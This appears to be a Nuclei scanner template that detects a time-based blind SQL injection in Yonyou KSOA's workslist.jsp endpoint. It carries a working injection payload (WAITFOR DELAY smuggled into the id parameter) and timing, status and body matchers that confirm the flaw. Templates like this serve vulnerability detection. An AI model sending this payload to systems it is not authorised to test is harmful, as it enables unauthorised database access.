http:
    - headers:
        Connection: close
        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
      matchers:
        - dsl:
            - duration>=3 && duration<8
          type: dsl
        - status:
            - 200
          type: status
        - part: body
          type: word
          words:
            - 登录
      matchers-condition: and
      method: GET
      path:
        - '{{BaseURL}}/worksheet/workslist.jsp?id=1'';WAITFOR+DELAY+''0:0:3''--'
id: yonyou-ksoa-workslist-sqli
info:
    author: onewin
    description: |
        用友时空KSOA的/worksheet/workslist.jsp接口存在时间盲注漏洞，攻击者可通过id参数执行任意SQL命令
        [漏洞发现时间：2025年7月]
    name: 用友时空KSOA workslist.jsp SQL注入漏洞
    reference:
        - https://example.com/yonyou-ksoa-sqli
    severity: high
    tags: []
